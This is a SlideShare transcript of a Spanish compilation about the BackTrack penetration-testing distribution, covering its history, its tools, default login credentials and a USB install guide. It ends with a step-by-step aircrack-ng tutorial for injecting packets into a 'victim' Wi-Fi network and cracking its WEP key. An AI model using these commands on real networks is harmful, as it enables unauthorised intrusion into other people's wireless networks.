• Share
  • Email
  • Embed
  • Like
  • Save
  • Private Content
Backtrack
 

Backtrack

on

  • 910 views

 

Statistics

Views

Total Views
910
Views on SlideShare
910
Embed Views
0

Actions

Likes
0
Downloads
17
Comments
0

0 Embeds 0

No embeds

Accessibility

Categories

Upload Details

Uploaded via as Microsoft Word

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Processing…
Post Comment
Edit your comment

    Backtrack Backtrack Document Transcript

    • piratería por el gusto de hacerlo proyectos Acerca BackTrack Keykeriki v1.0 - 27MHz Keykeriki v2.0 - 2.4GHz Misc Investigación y Código PrintFS SuisseID y Debilidades NPA enlaces Principal Acerca modzero AG Totalphase entradas recientes Content Transfer Hecho Collected primera y dominios de nivel segundo New Hosting, Diseño sencillo The Apple IdiotenVektor (IV) categorías crypto (1) hardware (0) misc(1) BackTrack Principal Historia
    • La distribución BackTrack originó a partir de la contraparte Linux WHax y Auditor Colección Seguridad de Max Moser - "La navaja suiza de las evaluaciones de seguridad". Tanto que se centró en las pruebas de penetración basados en Linux. Mientras WHax estaba lleno con más funciones, Auditor se basa en la estructura y la estabilidad. Auditor aparece bien diseñados, los menús para su colección de más de 300 herramientas para la solución de problemas, la red y los sistemas de fortificación. Su facilidad de uso se tradujo en una mayor facilidad de uso para las pruebas de penetración, que llevó a la formulación de la distribución de las pruebas de seguridad BackTrack. La Colección de Seguridad Auditor era un Live CD basado en Knoppix. WHax, un nombre derivado del sombrero blanco y SLAX, era una distribución diseñada para tareas de seguridad. WHax surgió de Whoppix, una distro de seguridad basado en Knoppix. Cuando Whoppix llegó a la versión 3.0 fue rebautizado como WHax, para reflejar el cambio de la distribución original de Knoppix para SLAX.Personalizada por Mati Aharoni, un consultor de seguridad, WHax hizo su foco central en las pruebas de penetración. WHax permitió probar y comprobar la seguridad de una red de muchos ordenadores ubicados en distintos lugares. El primer lanzamiento real de BackTrack estaba disponible para el público a principios del 2007. Fue un paso importante en el avance en comparación con todas las demás pruebas de penetración de seguridad distros disponibles. A través de los años y las versiones del distro se convirtió en la norma como pruebas de penetración kit de herramientas por todo el mundo. Grandes empresas como SANS, o incluso el FBI, donde el uso del CD-ROM como base para su trabajo. La demanda de este tipo de herramienta de la suite era inmensa. Suelte "pre-4" se ha descargado más de 4'000'000 veces. Los canales de IRC y también el correo electrónico y las entradas Foro se hicieron más grandes y lager. La comunidad llegó a ser tan grande que Backtrack necesita mucha ayuda de la comunidad. Ahora, a principios de los años 2010 BackTrack encuentra de nuevo un cambio importante ...... En tanto, BackTrack!
    • Como probablemente ya notado más famosa distribución de Linux la seguridad del mundo tiene un nuevo hogar: http://www.backtrack- linux.org . Sí, lo hicimos, y sí, fue muy divertido! Pero como todo lo bueno en la vida también BackTrack y Remote-Exploit.org han cambiado. La comunidad alrededor de BackTrack ha crecido y nuevos, pequeños desarrolladores, junto con uno de los fundadores principales empujó la distro en un ámbito más amplio, mientras que el equipo remoto Explotar decidió volver a lo básico: La investigación y publicación de las nuevas ideas y proyectos. ... Regreso a la diversión! ckTrack Linux Bienvenido a Backtrack-Linux.org, hogar de los de más alto rating y aclamados de seguridad de Linux de distribución hasta la fecha. BackTrack es un Linux basado en pruebas de penetración arsenal que los profesionales de seguridad ayuda en la capacidad de realizar evaluaciones en un entorno puramente nativa dedicada a la piratería. Sin importar si usted está haciendo BackTrack que BackTrack instalar , arrancar desde un Live DVD o pendrive , la distribución de la penetración se ha
    • personalizado hasta el último paquete, la configuración del núcleo, la escritura y el parche con el único propósito de la prueba de intrusión. BackTrack 5 R3 Fecha de lanzamiento! 13 de agosto 2012 Se ve mejor en pantalla completa ! BackTrack es para todos los públicos a partir de los profesionales de la seguridad con más experiencia a principios de los recién llegados a la seguridad de la información de campo. BackTrack promueve una forma rápida y fácil de encontrar y actualizar la mayor base de datos de seguridad de herramientas de recogida al día. Nuestra comunidad de usuarios van desde los probadores de penetración de expertos en el campo de seguridad de la información, las entidades gubernamentales, tecnología de la información, los entusiastas de la seguridad, y las personas nuevas a la comunidad de seguridad. Evaluación de todos los sectores y niveles de habilidad nos permite desarrollar una verdadera solución que se adapta a todo el mundo y supera con creces cualquier cosa que se haya desarrollado tanto comercial como de libre acceso. El proyecto está financiado por la Seguridad ofensivo . Ya sea que esté de hacking inalámbrico, la explotación de los servidores, la realización de una aplicación web de evaluación, el aprendizaje o la ingeniería social de un cliente, BackTrack es la ventanilla única para todas sus necesidades de seguridad. BackTrack BackTrack
    • BackTrack 5 R2 Desarrollador 'Remote ExploitTexto en negrita' Página web de BackTrack Linux Información general Modelo de desarrollo FOSS Última versión estable 5 R3 (info) 13 de agosto de 2012; hace 11 meses Núcleo Linux Tipo de núcleo Monolítico Interfaz gráfica por defecto KDE , GNOME Plataformas soportadas x86, x86-64, ARM(GNOME) Sistema de gestión de paquetes Synaptic
    • Licencia Varias Estado actual En desarrollo Idiomas Multilingüe (Instalación) En español BackTrack es una distribución GNU/Linux en formato LiveCD pensada y diseñada para la auditoría de seguridad y relacionada con la seguridad informática en general. Actualmente tiene una gran popularidad y aceptación en la comunidad que se mueve en torno a la seguridad informática. Se deriva de la unión de dos grandes distribuciones orientadas a la seguridad, el Auditor + WHAX. WHAX es la evolución del Whoppix (WhiteHat Knoppix), el cual pasó a basarse en la distribución Linux SLAX en lugar de Knoppix. La última versión de esta distribución cambió el sistema base, antes basado en Slax y ahora en Ubuntu.1 Incluye una larga lista de herramientas de seguridad listas para usar, entre las que destacan numerosos scanners de puertos y vulnerabilidades, archivos de exploits, sniffers, herramientas de análisis forense y herramientas para la auditoría Wireless. Fue incluida en el puesto 7 de la famosa lista "Top 100 Network Security Tools" de 2006.2 Índice [ocultar] 1 Whoppix y WHAX 2 Herramientas 3 Versiones publicadas 4 BackTrack 5 5 Referencias 6 Véase también 7 Enlaces externos Whoppix y WHAX[editar] Whoppix es una distribución Live de linux que nació con la intención de proporcionar un entorno unificado para la auditoría de seguridad. Su nombre deriva de White Hat Knoppix. La última versión antes de convertirse en WHAX (White Hat Slax), fue la 2.7
    • WHAX está pensado para pruebas de seguridad y penetración de sistemas. Posee las últimas versiones de varias herramientas de seguridad. El cambio de nombre se debe a la migración del sistema base, originalmente Knoppix, ahora SLAX. Herramientas[editar] Backtrack le ofrece al usuario una extensa colección de herramientas completamente usables desde un Live CD o un Live USB por lo que no requiere una instalación para poder usarse. O bien, se ofrece la opción de instalar en un disco duro. Entre las herramientas ofrecidas se encuentran: Aircrack-ng, Herramientas para auditoría inalámbrica Kismet, Sniffer inalámbrico Ettercap, Interceptor/Sniffer/Registrador para LAN Wireshark, Analizador de protocolos Medusa, herramienta para Ataque de fuerza bruta Nmap, rastreador de puertos Y una larga lista de otras herramientas, que se agrupan en 11 familias: Recopilación de Información Mapeo de Puertos Identificación de Vulnerabilidades Análisis de aplicaciones Web Análisis de redes de radio (WiFi, Bluetooth, RFID) Penetración (Exploits y Kit de herramientas de ingeniería social) Escalada de privilegios Mantenimiento de Acceso Forenses Ingeniería inversa Voz sobre IP Cabe destacar que siempre se le pueden añadir mas herramientas y software libre para desarrolladores de programación, herramientas de oficina, etc. Que originalmente no trae Backtrack, por otro lado también los creadores de esta distro pueden personalizar a gusto el backtrack. BackTrack 5[editar] El nombre código del lanzamiento es "revolution", pues da lugar a una serie de cambios muy importantes dentro de la distribución. BackTrack 5 está basado en Ubuntu 10.04 LTS (Lucyd Lynx)
    • y, por primera vez, ofrece soporte para arquitecturas de 32 y 64 bits, algo nuevo en la distribución, pues, hasta ahora, se había lanzado exclusivamente la versión de 32 bits. Es oficialmente soportado el entorno de escritorio KDE 4, Gnome y Fluxbox, lo que permite al usuario descargar la edición con el entorno de escritorio de su preferencia. Es también la primera versión de BackTrack que incluye el código fuente completo dentro de sus repositorios, aclarando así cualquier problema de licencias que se haya presentado en BackTrack 4. Se ha refrescado por completo la lista de herramientas que se incluyen en la nueva versión, y se han ido agregando más herramientas a los repositorios oficiales. También hay una sección en la página oficial para hacer sugerencias para incluir herramientas nuevas. 4 El lanzamiento de ésta nueva versión tuvo lugar el 10 de mayo de 2011. BackTrack 5 R3 Final ha sido puesto en libertad, la version R3 se centra en la correcciones de errores, así como la adición de más de 60 nuevas herramientas - varios de los cuales fueron puestos en libertad en el BlackHat y la Defcon 2012. Toda una categoría nueva herramienta - “Physical Exploitation”, que ahora incluye herramientas tales como el IDE de Arduino y bibliotecas, así como la recolección de Kautilya Teensy payload collection----- El lanzamiento de ésta nueva versión tuvo lugar el 13/08/2012----- BackTrack es una de las más conocidas y apreciadas distribuciones GNU/Linux orientadas a profesionales de la seguridad, con un enfoque especial hacia la realización de tests de penetración. Para dar una idea de su popularidad, baste decir que ocupa el puesto 32 en el famoso ránking de Insecure.org.
    • Se presenta como un LiveCD (por lo que ni siquiera necesita instalación) que proporciona en un par de minutos acceso a más de 300 herramientas de todo tipo (sniffers, exploits, auditoría wireless, análisis forense, etc) perfectamente organizadas. Por lo demás BackTrack incorpora también todas utilidades habituales en cualquier distribución al uso... La versión 2 (recién publicada) utiliza un kernel 2.6.20 con varios parches e incluye soporte para tarjetas inalámbricas Broadcom. Integra Metasploit 2 y 3. Puesto que hace muy poco presentábamos por aquí DVL, otra distribución dirigida al aprendizaje de la (in)seguridad informática, se hace necesario establecer de antemano la principal diferencia entre ambas. Baste decir que DVL -además de ser insegura por defecto- va claramente dirigida a entornos de aprendizaje (con profusión de tutoriales, etc), mientras que BackTrack es mucho más completa y potente, pero está enfocada a profesionales de la seguridad o al menos gente con buenos conocimientos. Aunque he de suponer en nuestros lectores la madurez necesaria, no estará de más recordar nuestro lema al respecto: los experimentos siempre en casa y con gaseosa. Cuidadín, que BackTrack tiene mucho poderío y te puede explotar en las manos. Aunque en la web de BackTrack se insinúa la próxima liberación de máquinas virtuales para VMware, Kriptópolis se ha adelantado y he creado una máquina virtual desde VMWare Workstation a partir de la ISO descargada (casi 700 MB). Como siempre, este juego de pantallas trata de mostrar -a grandes rasgos- lo que se encontrará el usuario que se aventure en BackTrack. Arrancando BackTrack:
    • Llegamos al login. Deberemos emplear root como nombre de usuario y toor como contraseña. Una vez logueados, teclearemosstartx para acceder a un escritorio KDE o bien flux si optamos por FluxBox. Arrancaremos KDE:
    • Mientras arranca KDE ya vemos que el diseño es sobrio pero agradable y muy cuidado:
    • Así luce el escritorio de BackTrack2 sin desplegar ningún menú:
    • Vamos a desplegar algún menú a modo de ejemplo. Por ejemplo el titulado BackTrack, que es donde se encuentra todo el meollo de esta distro. Por ejemplo, esta es la opción de herramientas misceláneas:
    • Sólo con echar un vistazo al resto de menúes de la imagen anterior ya os podéis imaginar lo que dan de sí más de 300 herramientas. Así luce Metasploit, la bestia parda, perfectamente configurado y en marcha:
    • Sí; si te has fijado en la esquina inferior derecha de la imagen anterior, BackTrack incluye también un Firefox 2.0.0.2 "torificado". En fin; espero haberos despertado el interés por esta magnífica distribución. Dejo a vuestro cargo seguir explorando sus posibilidades. Yo, de momento, salgo de KDE, tecleo halt y cierro el kiosco: Aclaración;"Este post es con fines Educativos y/o Didácticos, no me hago responsable del uso malicioso" Para emplear todo este proceso necesitas tener una interfaz de red inalámbrica (Wifi). Tener BackTrack 5 :No me digas: y un poco de conocimiento en GNU/Linux (saber usar la Terminal) Descarga Personalizada Primero vamos a la pagina de descarga de BackTrack 5
    • BackTrack Download Descarga Personalizada Escojan versión: Yo elegí Backtrack 5 R3 Windows Manager (manejador de vetanas): Yo elegí gnome, ya que para mi es mas cómodo Escojan su arquitectura: Mi arquitectura es de 32bits Tipo de Imagen: ISO (100% Recomendable) Tipo de descarga: Directo (Descarga Directa) Nota la ISO pesa mas de 3Gb así que si y tienes una conexión lenta descarga el torrent para descargarlo en 2 días como máximo con el programa Utorrent Descarga Directa, Si tienes una buena conexión Backtrack 32 bits 3,3Gb BackTrack 64 bits 3.1Gb Booteamos Backtrack 5 USB Mínimo 4 Gb DVD Mínimo 4.7 Gb Programa para bootear en una Pendrive Pueden usar linuxLiveUSB Home LinuxLiveUsb o UNetbootin Home UNetbooting Yo usaré UNetbooting Download Un Pequeño MiniTuto
    • 1.- Aquí escogerán la distribución a instalar, en este caso es BackTrack 5. 2.- Elegirán la versión de la distribución. 3.- Selecciona la ruta donde se encuentra la imagen ISO de BackTrack 5. 4.- Selecciona el tipo de unidad, puede ser un Pendrive o un Disco duro. 5.- Selecciona la letra de la unidad. 6.- Esta opción se seleccionara automáticamente al hacer todo bien. 7.- Ahora dan clic en aceptar y comenzara la instalación en la memoria, después de unos minutos el proceso terminara y ya podemos ejecutar el Backtrack 5 desde una Memoria USB. Programa para bootear en una DVD Usen nero 9 algo parecido, ustedes sabrán Ahora si empezemos 1. Paso: Saber el nombre de nuestra interface (Targeta Wireless) para colocar en Modo Monitor, para esto abrimos una terminal y escribimos lo siguiente: Cita: Ocultar airmon-ng Y nos aparecerá el nombre de nuestra interfaz, el chipset y el driver en mi caso es una el nombre de la interfaz es Wlan0 2. Paso: Ya qué conocemos el nombre de nuestra interfaz procedemos a ponerla en Modo Monitor y escribimos lo siguiente: Cita: Ocultar airmon-ng start wlan0
    • Ya tenemos nuestra targeta en Modo Monitor (monitor mode enabled on mon0) se podrán dar cuenta "mon0" es el nombre de la interfaz en modo monitor. 3. Paso: Ahora vamos a escanear redes disponibles con el siguiente comando: Cita: Ocultar airodump-ng mon0 y con esto comenzará a mostrarnos las Redes Disponibles. Para seleccionar la Red Víctima tenemos qué detener el escaneo presionando ctrl+c 4. Paso: En este paso vamos a Capturar la Red Víctima para esto escribimos el siguiente comando: Cita: Ocultar airodump-ng -w redes -c 11 --bssid 00:22:A4:30:FE:59 mon0 donde -w = especifica el nombre del archivo donde se guarda la captura de datos -c = especifica el canal de la Red --bssid = especifica Mac de Punto de Acceso mon0 = especifica la interfaz de la targeta de Red en Modo Monitor 5. Paso: Abrimos una segunda Terminal (sin cerrar la primera) y escribimos lo siguiente: Cita: Ocultar aireplay-ng -1 0 -a 00:22:A4:30:FE:59 mon0 esto es para Asociar su pc con la Red Víctima 6. Paso: Ahora si viene lo bueno, a inyectar paquetes a la red, para esto tecleamos lo siguiente: Cita: Ocultar aireplay-ng -3 -b 00:22:A4:30:FE:59 mon0 con esto enviaremos y recibiremos paquetes. Vamos a la primera Terminal y en la columna #Data se incrementará rapidamente, y esperamos a que llegue a los 30,000 datos para poder desemcriptar la Clave 7. Paso: Cuando llegue a los 30,000 datos abrimos una tercera y última Terminal y escribimos el famoso comando: Cita: Ocultar aircrack-ng redes-01.cap
    • redes =archivo donde se guarda la captura (.cap) el mismo qué mencionamos en el paso 3 damos enter y empezará a decifrar a la clave y Vualá Clave desemcriptada Cita: Ocultar Key Found¡ (09:86:23:47:63) Y en dado caso de qué no entiendan un carajo¡ ahi les dejo 2 Vídeos - See more at: http://www.identi.li/index.php?topic=117891#sthash.ieDDud00.dpuf ¡A disfrutar! BackTrack